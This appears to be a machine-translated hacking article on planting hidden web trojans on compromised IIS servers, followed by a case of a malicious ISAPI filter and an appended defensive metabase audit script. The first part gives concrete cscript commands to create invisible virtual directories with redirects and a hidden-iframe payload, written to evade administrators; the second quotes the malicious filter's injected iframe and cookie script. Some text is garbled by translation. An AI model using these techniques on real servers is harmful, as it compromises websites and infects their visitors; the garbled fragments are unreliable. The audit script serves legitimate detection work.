There are also some foreign machines on which all permissions had been obtained, yet, for reasons I don't understand, nothing could be written to them. A file would finally get written, and a while later it was changed back. It really makes people feel very good! It is said that there is a kind of software that monitors important files and restores them as soon as a change is found. For example, if it monitors the web directory, we cannot change any content of the website. However, after reading a lot of articles about Dazhe, I also studied it a little and finally figured something out: I can modify other people's pages, with the often-mentioned consequences such as hanging horses (planting web trojans), without writing any files. I introduce it here so that administrators who only know how to be diligent can also be careful!
As we all know, when we browse a website, the server processes the information into HTML and returns it to us. What we want to achieve is to change the content that reaches visitors' browsers, so that they secretly execute our things such as *s. The more common way is to introduce a frame and set its attributes to make it invisible on the page, or, without fear of death, to use a JavaScript jump. More advanced approaches take HTML elements already in the original code, such as script tags or frame tags, and tamper with the files or pages those tags pull in, or change database content that is displayed on the homepage, for example modifying announcements in the database, to hang the horse. However, all of these require adding something to the code on the server or modifying the content of the website. Whether it is cross-site scripting or direct modification of the source, this is extremely easy to discover. When you meet a diligent administrator, your things will not stay on the server for long! Also, when some pages cannot be written to, we are stuck as well, so a more hidden and safer way is needed to solve the above problems!
Let's go to the IIS manager first! Select a page and look at its properties, as shown in Figure 1. Haha, there is resource redirection! If we redirect this page to a page we already control, then when the browser requests this page it will go to the page we defined instead. What if that page is a web page *? Obviously, visitors will be hit! This is a very simple way: you only need to change the page's redirection in IIS, and anyone who has access to the IIS manager can do it easily! But there is still a problem. If the administrator finds that the page is always redirected, and checking the website files and restoring from backup still fails to solve it, he will definitely go and look in IIS! If he happens to see the properties of the main page, he will notice something wrong and can change it back!
Then let's see whether there is a more hidden way! Borrowing the horse-hangers' earlier method: since the main page is easy to discover, go and check the HTML tags in the main page! It gets easier if you find that other pages are called. For example, there is a tag like this in the home page:
<script src=include/></script>
Then we have a way: modify the properties of include/! As shown in Figure 2, point it to a certain page of ours. Of course, the content must be something that can be interpreted inside a script tag, such as:
("<iframe style=display:none; src= width=0 height=0></iframe>");
This will introduce our page! Of course, it is best to implement the file's JS functions first! That is hidden enough! Now the administrator will find that the homepage has not changed, the properties of the homepage in IIS have not changed, and not a single www file on the host has been modified. He will be very depressed, hehe! If he just restores a previous website backup, the page will still not change back! There are so many files in IIS that he cannot look at the properties one by one! By the way, note that the file you choose to redirect must be one that is interpreted through an HTML tag, otherwise it will have no effect! For example, it is useless to redirect to our * page, because the * page is not parsed as HTML but is sent to the img tag as an image! The tags I can think of that can be used are script and frame. As for CSS, I think it can be used, but I haven't found how yet! I don't know if I analyzed it correctly, and everyone is welcome to give me advice!
Let's continue! Suppose the administrator is capable or diligent enough to find out that something was done there, and restores it from IIS. Our dream is shattered again! Is there an even more hidden way, one the administrator cannot find even in IIS? The answer is yes! Everyone must remember the IIS configuration vulnerability from a long time ago, which could be used to create an invisible virtual directory and then place a backdoor inside. We can borrow it too! Let's look at the principle of that IIS configuration vulnerability: a virtual directory is created without a physical directory, so it is invisible in IIS, and then some small actions can be done in this directory. Here we first create an invisible virtual directory. If the home page calls a js file under the include folder, we create the include directory! This can be done with the help of the IIS scripts, which are in the IIS installation directory, such as C:\Inetpub\AdminScripts, and which control the behavior of IIS. The commands we use are as follows:
cscript Create W3SVC/1/Root/www/include "IIsWebVirtualDir"
In this way, a virtual directory that is invisible in IIS is created; it is not displayed because no path is set! Then create a virtual directory called " Haha! Special characters such as . can actually be used when creating a virtual directory:
cscript Create W3SVC/1/Root/www/include/ "IIsWebVirtualDir"
This way there is a virtual directory of include/! What comes to mind? Is it the same as the name of the file called on the homepage? Let's keep going!
cscript set W3SVC/1/Root/www/include//httpredirect "/"
This changes the redirection property of the virtual directory, as shown in Figure 3. Note that W3SVC/1/Root/www/ represents the www virtual directory of the first web server under IIS. If you are not sure about it, you can use the enum parameter to look up the website you need to change. For other operations, open the script and read its help! After this operation, the redirection property of the virtual directory is set. Now try requesting the include/ file called in the homepage. Can you guess whether the original content is returned or ours? The answer is as shown in Figure 4, and the physical files still exist! This may be a feature of IIS: when it handles the user's request, the virtual directory takes precedence over the physical files! Then let's go to IIS and see whether there is any include virtual directory. As shown in Figure 5, no! Hehe! In this way we successfully get around the permission restrictions and the administrator's detection! Our *s hang on the other party's website, and it will be difficult for him to clear them unless he redoes IIS or deletes our hidden virtual directory!
The article is very simple. The key is the commands of the IIS scripts and some understanding of IIS. This method of hanging horses applies after administrator permissions have been obtained, and it is still very useful against administrators who are merely diligent! If you find any problem on the website in the future, remember to use this script to check whether anything is wrong! Or simply back up the IIS settings too, and restore them when you encounter problems, haha!
2. The entire server is hit by horse-hanging; the injected code on the web pages cannot be found in the source files.
On one server, the pages of almost all websites, even plain HTML pages, come back containing:
<iframe src="http://xxxdfsfd/" height=0 width=0></iframe>
Code of this style usually appears at the head of the page. With some antivirus software, opening the page triggers a virus report.
Open the HTML, ASP or PHP page files: this code cannot be found in the source code.
At first I suspected that it was JS. I searched for a long time but still couldn't find it. Even a newly created HTML page would have this code~
Searching carefully, I concluded the problem must be in IIS. I restarted it once, right-clicked the main IIS node, opened Properties, then ISAPI, and found an ISAPI extension that I had never seen before.
The path is: c: ISAP loading normally, green state
After I removed it and restarted IIS, all the code disappeared.
The add-in contains three files:
Contents are:
Cookie=GAG5=ABCDEFG
Redirector=C:
Contents are:
<body>
<iframe src="/" height=0 width=0></iframe>
<script language="javascript">
<!--
var expires = new Date();
(() + 5 * 24* 60 * 60 * 1000);
="GAG5=ABCDEFG;expires="+();
-->
</script>
</body>
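A defender-side check for both cases described above (the path-less virtual directory carrying a redirect, and the unfamiliar ISAPI filter), as an added example that is not part of the original article: it parses an IIS 6 style MetaBase.xml export and lists the entries worth reviewing. The sample XML is constructed and simplified, and the file name menu.js, the redirect URL, unknown.dll and the allowlist are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed, simplified sample in the style of an IIS 6 MetaBase.xml export.
# The file name menu.js, the redirect URL and unknown.dll are made up.
SAMPLE = r"""<configuration><MBProperty>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/www" Path="D:\sites\www"/>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/www/include"/>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/www/include/menu.js"
                  HttpRedirect="http://redirect.example/"/>
<IIsFilter Location="/LM/W3SVC/Filters/Compression"
           FilterPath="C:\WINDOWS\system32\inetsrv\compfilt.dll"/>
<IIsFilter Location="/LM/W3SVC/Filters/unknown" FilterPath="C:\temp\unknown.dll"/>
</MBProperty></configuration>"""

# Assumption: the filters this server is supposed to load (lower-cased paths).
ALLOWED_FILTERS = {r"c:\windows\system32\inetsrv\compfilt.dll"}

WEB_NODES = ("IIsWebVirtualDir", "IIsWebDirectory", "IIsWebFile")


def audit(xml_text, allowed_filters=ALLOWED_FILTERS):
    """Return (location, reason) pairs for metabase entries worth reviewing."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        kind = el.tag.rsplit("}", 1)[-1]      # drop an XML namespace if present
        loc = el.get("Location", "")
        if kind in WEB_NODES and el.get("HttpRedirect"):
            findings.append((loc, "redirects to " + el.get("HttpRedirect")))
        if kind == "IIsWebVirtualDir":
            if not el.get("Path"):
                # No physical path: the case the article says IIS Manager hides.
                findings.append((loc, "virtual directory without a Path"))
            if "." in loc.rsplit("/", 1)[-1]:
                findings.append((loc, "virtual directory named like a file"))
        elif kind == "IIsFilter":
            path = el.get("FilterPath", "")
            if path.lower() not in allowed_filters:
                findings.append((loc, "ISAPI filter not in allowlist: " + path))
    return findings


if __name__ == "__main__":
    for location, reason in audit(SAMPLE):
        print(location, "-", reason)
```

Comparing the output against a known-good export taken when the server was built makes unexpected entries stand out, which is the configuration backup the article itself recommends.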